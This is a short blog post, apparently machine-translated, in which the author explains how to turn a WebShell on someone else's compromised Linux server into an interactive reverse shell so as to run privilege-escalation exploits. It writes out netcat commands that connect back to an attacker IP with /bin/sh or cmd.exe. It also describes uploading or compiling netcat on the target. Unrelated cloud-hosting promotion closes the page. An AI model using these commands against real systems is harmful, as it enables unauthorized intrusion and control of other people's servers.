After playing for half a day, my friend gave me a Linux WebShell. I wanted to practice UDEV privilege escalation, and finally found that the server seems to have been patched.
But there are still other gains, so I will be able to reverse the shell of Linux in YY.
The vast majority of Linux Elevation of Privilege relies on Local Exploit. Generally, WebShell can execute commands, but our EXP must be run in an interactive environment. Otherwise, if it is executed directly in WebShell, we cannot exploit it even if the elevation of permission is successful. Therefore, we need to first bounce a CmdLine shell((directly say that cmdshellis afraid of false resolution ...for this reason, there is a Windows cmd.exe cmd_^), and then execute EXP in the command line terminal to escalate permissions.
Generally, most people use the Back Connect function of PHP WebShell to bounce Back a Shell, but sometimes the server does not support PHP or WebShell to rebound, for example, a JSPShell server that my friend gave me over the past two days only supports JSP and does not support PHP. At this time, we can use the classic netcat.
When doing things in Windows, we can run nc-vv-lp 1234 listening port on the local machine if necessary, then nc 12.21.12.21 1234-e cmd.exe on the broiler server returns a reverse shell, which is still feasible in Linux.
After listening on the local machine, run nc 12.21.12.21 1234-e/bin/sh in WebShell to play a CmdLine Shell for us.
However, we often encounter a situation that is not as smooth as 100%. Like the two servers last night, each server cannot directly execute nc. One has an nc, but the execution never works. The other has no nc ....
However, we can install one for him. The quick way is that we can go to the plugin (I started to upload my netcat that comes with Debian, the result still cannot run ....). If not, upload the source code and compile it on the target machine.
Last night, one of the two machines was locally compiled and the other was compiled on the target machine. If the directly transferred nc can be run, it is easy to say that if you need to compile it on the target machine, here is a little trick:
Before getting the CmdLine Shell, we can only execute commands in WebShell. Generally, we can only execute one command at a time and wait for ECHO. If our WebShell is in the/var/www/site directory, the default path of each command is/var/www/site, our netcat source package is decompressed to the/tmp/netcatsrc folder. In this case, when we compile netcat, configure is okay to say that the/tmp/netcatsrc/configure command is available, but the next step of make will not work, because the current path is/var/www/site, instead of the/tmp/netcatsrc/we want, so we will report an error when configure is finished making.
It is actually very easy to solve this problem. You can simply write two sentences into one sentence: cd/tmp/netcatsrc; make
Use semicolons (;) to separate and write the make statement following the directory switch command, so that no error will be reported during compilation. (Stray cats teach .. ^_^)
This method is useful when the CmdLine Shell is not yet obtained.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
